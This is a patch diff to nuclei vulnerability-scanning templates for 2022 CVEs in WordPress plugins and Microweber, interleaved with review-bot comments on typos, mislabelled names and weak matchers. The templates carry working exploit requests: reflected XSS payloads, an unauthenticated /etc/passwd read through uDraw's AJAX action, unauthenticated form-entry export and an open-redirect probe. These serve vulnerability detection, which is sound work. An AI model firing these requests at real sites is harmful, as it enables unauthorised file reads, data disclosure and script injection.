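Review bot: The sixth entry in the new `paths` payload list, `/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?...`, repeats `libs/` while the other eight entries use `/libs/bower/bower_components/...`; it was carried over from the old `path` list and looks like a typo, so the `readd.php` probe is likely sent to a path that does not exist. Unless the doubled segment is deliberate, change it to `- "/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"`. Moving the paths into `payloads` makes each entry its own request, so the template's `max-request` (outside this hunk) should reflect nine requests.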
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress BackupBuddy plugin before 8.8.3 contains a cross-site vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in various locations. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 8.8.3. reference: - https://wpscan.com/vulnerability/7b0eeafe-b9bc-43b2-8487-a23d3960f73f @@ -16,7 +18,7 @@ info: cve-id: CVE-2022-4897 cwe-id: CWE-79 epss-score: 0.00289 - epss-percentile: 0.65503 + epss-percentile: 0.65597 cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: ithemes product: backupbuddy framework: wordpress - tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated + tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated,ithemes http: - raw: @@ -45,4 +47,4 @@ http: - 'contains(body_2, "onload=alert(document.domain)")' - 'contains(body_2, "BackupBudddy iFrame")' condition: and -# digest: 490a00463044022068ea89cefce681b40542a73a2df15ae352a45453df7ddb6e01d0cc00e396fd4802206d80e3c01d45c5b7ab73b5a0216b93cbf7f30b45ec940ff14cbef393de8a2c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220026a95c6a87aa0d2140d2a60adc495b4a0dad0cdd2317d7549a94ce433f36cb902207b8b7822fd59ff49758d0f24180dbab021c12624f025de15725d063df72e3fa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/cve-2022-0140.yaml b/nuclei-templates/CVE-2022/cve-2022-0140.yaml new file mode 100644 index 0000000000..5c5b1d5e09 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0140.yaml 
@@ -0,0 +1,56 @@ +id: CVE-2022-0140 + +info: + name: WordPress Visual Form Builder <3.0.8 - Cross-Site Scripting + author: random-robbie + severity: medium + description: | + WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WordPress Visual Form Builder plugin (3.0.8) or apply the vendor-supplied patch to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336 + - https://www.fortiguard.com/zeroday/FG-VD-21-082 + - https://nvd.nist.gov/vuln/detail/cve-2022-0140 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2022-0140 + cwe-id: CWE-306 + epss-score: 0.00966 + epss-percentile: 0.8297 + cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: vfbpro + product: visual_form_builder + framework: wordpress + tags: cve,cve2022,wpscan,xss,wordpress,vfbpro + +http: + - raw: + - | + POST /wp-admin/admin.php?page=vfb-export HTTP/1.1 + Host: {{Hostname}} + Referer: {{RootURL}}/wp-admin/admin.php?page=vfb-export + Content-Type: application/x-www-form-urlencoded + Origin: {{RootURL}} + + vfb-content=entries&format=csv&entries_form_id=1&entries_start_date=0&entries_end_date=0&submit=Download+Export+File + + matchers-condition: and + matchers: + - type: word + words: + - '"Date Submitted"' + - '"Entries ID"' + 
condition: and + + - type: status + status: + - 200 +# digest: 4a0a004730450220555e72b8a7ce8ba848bc013ba68905a0892db7854b4d5a487b4b342d5595b0cf0221009227b34829104b03a2a178ba1afc5c13f05c4db7f63a5971c34a3a95685fa9bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0148.yaml b/nuclei-templates/CVE-2022/cve-2022-0148.yaml new file mode 100644 index 0000000000..ae65b6dbeb --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0148.yaml 
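Review bot: The new template's `name` (`... - Cross-Site Scripting`), its `impact` text about script execution in the victim's browser, and the `xss` tag do not match what the rest of the file describes: the description says an unauthenticated user can export form entries as CSV via the `vfb-export` endpoint, the classification is `CWE-306` (missing authentication), and the matcher looks for the CSV column headers `"Date Submitted"` and `"Entries ID"`. Rename it along the lines of `name: WordPress Visual Form Builder <3.0.8 - Unauthenticated Entries Export`, replace the `xss` tag with `exposure` as the other disclosure templates in this commit use, and reword `impact` to describe disclosure of submitted form entries. The remediation text is consistent with the `<3.0.8` in the name.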
@@ -0,0 +1,62 @@ +id: CVE-2022-0148 + +info: + name: WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting + author: DhiyaneshDK + severity: medium + description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. + remediation: | + Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148 + - https://plugins.trac.wordpress.org/changeset/2654453/mystickyelements + - https://nvd.nist.gov/vuln/detail/CVE-2022-0148 + - https://github.com/ARPSyndicate/cvemon + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-0148 + cwe-id: CWE-79 + epss-score: 0.00144 + epss-percentile: 0.50222 + cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: premio + product: mystickyelements + framework: wordpress + tags: cve,cve2022,xss,wp-plugin,authenticated,wpscan,wordpress,premio + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + + - 
type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a00473045022100b170ba0c6ad3af42bd6f70aa404652b0e6a8213f3e4f81a152225e137fb949fa022042b2e76073edf8be64e0c79747b2e2791f3b6172349bdfc3bce8a1420a03fbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0149.yaml b/nuclei-templates/CVE-2022/cve-2022-0149.yaml deleted file mode 100644 index ef415ad101..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0149.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2022-0149 - -info: - name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Reflected Cross-Site Scripting - author: dhiyaneshDk - severity: medium - description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page. - reference: - - https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c - - https://nvd.nist.gov/vuln/detail/CVE-2022-0149 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2022-0149 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | - GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/28 diff --git a/nuclei-templates/CVE-2022/cve-2022-0165.yaml b/nuclei-templates/CVE-2022/cve-2022-0165.yaml deleted file mode 100644 index 9c67da252a..0000000000 
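Review bot: The new authenticated template logs in with the first raw request and then fetches `/wp-admin/admin.php?page=my-sticky-elements-leads&...` in the second, but nothing between the second request and `matchers-condition: and` carries the session over; the template deleted in the same commit (cve-2022-0149.yaml, visible below) had `cookie-reuse: true` at that spot. Unless the nuclei version in use reuses cookies by default, add `cookie-reuse: true` after the raw block, otherwise the admin page redirects to login and the matcher never fires. The first body word matcher shows as `''` here; if the file really contains an empty string it matches every body and should hold the expected reflected marker, though it may simply have been stripped in this rendering.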
--- a/nuclei-templates/CVE-2022/cve-2022-0165.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2022-0165 - -info: - name: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect - author: akincibor - severity: high - description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). - reference: - - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb - - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2022-0165 - cwe-id: CWE-601 - tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# Enhanced by mp on 2022/06/29 diff --git a/nuclei-templates/CVE-2022/CVE-2022-0201.yaml b/nuclei-templates/CVE-2022/cve-2022-0201.yaml similarity index 100% rename from nuclei-templates/CVE-2022/CVE-2022-0201.yaml rename to nuclei-templates/CVE-2022/cve-2022-0201.yaml diff --git a/nuclei-templates/CVE-2022/cve-2022-0208.yaml b/nuclei-templates/CVE-2022/cve-2022-0208.yaml index 29da10141b..b9f0a551d6 100644 --- a/nuclei-templates/CVE-2022/cve-2022-0208.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-0208.yaml 
@@ -6,27 +6,37 @@ info: severity: medium description: | WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0208 cwe-id: CWE-79 - tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: mappresspro + product: mappress + framework: wordpress + tags: cve2022,cve,mappress,xss,wordpress,wp-plugin,wpscan,mappresspro -requests: +http: - method: GET path: - "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: @@ -39,4 +49,7 @@ requests: - "Bad mapid" condition: and -# Enhanced by mp on 2022/09/08 + - type: status + status: + - 200 +# digest: 4b0a00483046022100b22a13c10631b7349f4edafe8cde23c314f46cc6c3661afdbef2141c2f9cab67022100adfeec912a26c02a2ba1982ccd3dddb34fab524142068da9e659428a5efd7e4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
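Review bot: The two `https://github.com/ARPSyndicate/...` entries added under `reference:` in the first hunk are template-aggregator mirrors rather than sources for CVE-2022-0208; a reader checking provenance gains nothing from them beyond the WPScan and NVD links already present. Keeping `reference:` to primary advisories and the vendor changelog also stops the template's metadata from drifting when those mirrors change. The same additions appear in the hunks for CVE-2022-0271, CVE-2022-0281, CVE-2022-0346, CVE-2022-0653, CVE-2022-0656, CVE-2022-1439 and CVE-2022-1815 in this patch.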
diff --git a/nuclei-templates/CVE-2022/cve-2022-0271.yaml b/nuclei-templates/CVE-2022/cve-2022-0271.yaml
new file mode 100644
index 0000000000..825e258e1e
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-0271.yaml
@@ -0,0 +1,54 @@ +id: CVE-2022-0271 + +info: + name: LearnPress <4.1.6 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. + remediation: | + Upgrade LearnPress to version 4.1.6 or later to mitigate this vulnerability. + reference: + - https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0271 + - https://nvd.nist.gov/vuln/detail/cve-2022-0271 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0271 + cwe-id: CWE-79 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: thimpress + product: learnpress + framework: wordpress + tags: cve2022,cve,wp,wp-plugin,wordpress,learnpress,wpscan,xss,thimpress + +http: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{"dismissed":"xxx"}' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a0047304502207bcdd80813e3bb53a903169393ab76e55fd5ac3e02acff9fa2d8067ad6ab297b0221008bb18cbaef7d28bf2c5b4aa93fbccaded6af697a281db594c73f1fd6b0b28f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
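Review bot: The request in the `http:` block sends the fixed value `lp-dismiss-notice=xxx` and the body matcher looks for `'{"dismissed":"xxx"}'`, so any cached or static response that happens to contain that literal satisfies the matcher without the endpoint actually reflecting input. A per-run marker, `lp-dismiss-notice={{randstr}}` in the path and `'{"dismissed":"{{randstr}}"}'` in `words:`, ties the match to this request; other templates in this patch already use `{{randstr}}` in requests, but confirm the engine substitutes it in matcher words as well. The `text/html` header matcher is what distinguishes reflection rendered as a page from a plain JSON reply, so a one-line comment saying so above it would help the next reader.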
diff --git a/nuclei-templates/CVE-2022/cve-2022-0281.yaml b/nuclei-templates/CVE-2022/cve-2022-0281.yaml
new file mode 100644
index 0000000000..d8722dcaad
--- /dev/null
+++ b/nuclei-templates/CVE-2022/cve-2022-0281.yaml
@@ -0,0 +1,51 @@ +id: CVE-2022-0281 + +info: + name: Microweber Information Disclosure + author: pikpikcu + severity: high + description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. + impact: | + Successful exploitation of this vulnerability can lead to the exposure of sensitive data, such as user credentials or database information. + remediation: | + Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281). + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0281 + - https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6 + - https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-0281 + cwe-id: CWE-200 + epss-score: 0.0049 + epss-percentile: 0.73618 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: microweber + product: microweber + shodan-query: http.favicon.hash:780351152 + tags: cve,cve2022,microweber,disclosure,huntr + +http: + - method: GET + path: + - "{{BaseURL}}/api/users/search_authors" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"username":' + - '"email":' + - '"display_name":' + condition: and + + - type: status + status: + - 200 +# digest: 490a004630440220552d3cc2790a8fb8ada853011b816e67b148be6db2063639e9518d3ebcae1762022011a0940c35ce73be7f6d5ce093eadb2afbdfc00dd05d86f7da12af5bff26c926:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0346.yaml b/nuclei-templates/CVE-2022/cve-2022-0346.yaml index 30d405b5e9..709d25d12b 100644 
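Review bot: `remediation:` in the new file says only "Apply the latest security patch or update", while `description:` two lines above fixes the boundary at microweber/microweber prior to 1.2.11; state the version, e.g. `remediation: Upgrade Microweber to version 1.2.11 or later.`, as the CVE-2022-0660 template in this same patch does. The `impact:` text claims exposure of "user credentials or database information", which neither the description nor the matcher (`"username":`, `"email":`, `"display_name":` from `/api/users/search_authors`) supports; limit it to the fields the endpoint is observed to return.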
--- a/nuclei-templates/CVE-2022/cve-2022-0346.yaml
+++ b/nuclei-templates/CVE-2022/cve-2022-0346.yaml
@@ -6,27 +6,39 @@ info: severity: medium description: | WordPress XML Sitemap Generator for Google plugin before 2.0.4 contains a cross-site scripting vulnerability that can lead to remote code execution. It does not validate a parameter which can be set to an arbitrary value, thus causing cross-site scripting via error message or remote code execution if allow_url_include is turned on. + impact: | + Successful exploitation of these vulnerabilities could allow an attacker to execute arbitrary code on the affected system or inject malicious scripts into web pages viewed by users. + remediation: | + Update the WordPress XML Sitemap Generator for Google plugin to version 2.0.4 or later to mitigate the XSS and RCE vulnerabilities. reference: - https://wpscan.com/vulnerability/4b339390-d71a-44e0-8682-51a12bd2bfe6 - https://wordpress.org/plugins/www-xml-sitemap-generator-org/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0346 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0346 cwe-id: CWE-79 + epss-score: 0.00088 + epss-percentile: 0.36353 + cpe: cpe:2.3:a:xmlsitemapgenerator:xml_sitemap_generator:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org + verified: true + max-request: 2 + vendor: xmlsitemapgenerator + product: xml_sitemap_generator + framework: wordpress + tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,www-xml-sitemap-generator-org,xmlsitemapgenerator -requests: +http: - method: GET path: - '{{BaseURL}}/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp' - '{{BaseURL}}/?p=1&xsg-provider=data://text/html, -----------------------------92633278134516118923780781161-- - - | GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.svg HTTP/1.1 Host: 
{{Hostname}} - req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "alert(document.domain)")' - 'status_code_2 == 200' condition: and - -# Enhanced by md on 2022/09/08 +# digest: 490a0046304402200bfd837680f36e8110d8eef44bd96b117d17b66466691a831f6465ce55cbfa74022069141b6a4dcc45bebefa8074faac3b961b8bfb9dd121151c45865473254fbde3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0599.yaml b/nuclei-templates/CVE-2022/cve-2022-0599.yaml deleted file mode 100644 index b1a73d1aa8..0000000000 --- a/nuclei-templates/CVE-2022/cve-2022-0599.yaml +++ /dev/null 
@@ -1,48 +0,0 @@ -id: CVE-2022-0599 - -info: - name: WordPress Mapping Multiple URLs Redirect Same Page <=5.8 - Cross-Site Scripting - author: scent2d - severity: medium - description: | - WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page. - reference: - - https://wpscan.com/vulnerability/4f1d45bc-d3bd-472c-959d-05abeff32765 - - https://wordpress.org/plugins/mapping-multiple-urls-redirect-same-page/ - - https://nvd.nist.gov/vuln/detail/cve-2022-0599 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2022-0599 - cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,wp,authenticated,wpscan - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=mmursp-list&view=edit&mmursp_id="> HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'id="mmursp_id" value="\">" />' - - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(all_headers_2, "text/html")' - condition: and - -# Enhanced by md on 2022/09/08 diff --git a/nuclei-templates/CVE-2022/cve-2022-0653.yaml b/nuclei-templates/CVE-2022/cve-2022-0653.yaml new file mode 100644 index 0000000000..93b3090e9e --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0653.yaml 
@@ -0,0 +1,53 @@ +id: CVE-2022-0653 + +info: + name: Wordpress Profile Builder Plugin Cross-Site Scripting + author: dhiyaneshDk + severity: medium + description: | + The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: Upgrade to version 3.6.5 or later. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653 + - https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/ + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail= + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-0653 + cwe-id: CWE-79 + epss-score: 0.00206 + epss-percentile: 0.58596 + cpe: cpe:2.3:a:cozmoslabs:profile_builder:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: cozmoslabs + product: profile_builder + framework: wordpress + tags: cve,cve2022,wordpress,xss,wp-plugin,cozmoslabs + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404" + + matchers-condition: and + matchers: + - 
type: word + part: body + words: + - 'here' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4b0a0048304602210091b62172c9f552ed6b838c32d0fb253af0500b6380039c00927350af13bd4588022100d74ef37424d0bda0c76c16f24087248e86e5e647e5a6a80879391bd635f0a0dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0656.yaml b/nuclei-templates/CVE-2022/cve-2022-0656.yaml new file mode 100644 index 0000000000..62d781c125 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-0656.yaml 
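Review bot: The first `reference:` entry in the new file is malformed: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653` omits the `CVE-` prefix and is unlikely to resolve to the record, so it should read `- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0653`. The `description:` also ends in a double period ("3.6.1..") and has "onto a pages", and it states affected versions "up to and including 3.6.1" while `remediation:` says "Upgrade to version 3.6.5 or later" — one of the two version numbers looks wrong and should be checked against the Wordfence reference. The body matcher's single word `'here'` is a very common token; if that is really all the committed file matches on, the `text/html` and `200` matchers add little and the check will fire on many unrelated pages.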
@@ -0,0 +1,54 @@ +id: CVE-2022-0656 + +info: + name: uDraw <3.3.3 - Local File Inclusion + author: akincibor + severity: high + description: uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc). + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. + remediation: | + Upgrade uDraw to version 3.3.3 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/925c4c28-ae94-4684-a365-5f1e34e6c151 + - https://nvd.nist.gov/vuln/detail/CVE-2022-0656 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-0656 + cwe-id: CWE-552 + epss-score: 0.00684 + epss-percentile: 0.77939 + cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 1 + vendor: webtoprint + product: web_to_print_shop\ + google-query: inurl:"/wp-content/plugins/udraw" + tags: cve,cve2022,wp,wordpress,wp-plugin,unauth,lfi,udraw,wpscan,webtoprint + +http: + - raw: + - | + POST /wp-admin/admin-ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + + action=udraw_convert_url_to_base64&url=/etc/passwd + + matchers-condition: and + matchers: + - type: word + words: + - "cm9vd" # root in base64 + - "data:image\\/;base64" + condition: and + + - type: status + status: + - 200 +# digest: 
4b0a00483046022100e1754a9ee9845d4b7fff44b3fa86b0f357226bfe6c8e1a2188eec44df0349cc6022100821681fd1c6b34cb907739069bef0ac84c01aefb733c8bda81ee38300e2520d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/cve-2022-0660.yaml b/nuclei-templates/CVE-2022/cve-2022-0660.yaml index 9cdc808f6e..03acf180ab 100644 --- a/nuclei-templates/CVE-2022/cve-2022-0660.yaml +++ b/nuclei-templates/CVE-2022/cve-2022-0660.yaml 
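Review bot: `product: web_to_print_shop\` under `metadata:` in the new file ends in a bare backslash, which looks like the escaped colon in `cpe: cpe:2.3:a:webtoprint:web_to_print_shop\:udraw:...` was cut off during generation; as a YAML plain scalar the backslash is kept literally, so the product name is wrong. Either carry the full CPE product over, `product: 'web_to_print_shop:udraw'`, or use the plain plugin name `udraw` that `tags:` already uses. The `# root in base64` comment on the first matcher word is a good model; a similar one-liner on `"data:image\\/;base64"` stating what prefix the plugin is expected to emit would help the next reader.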
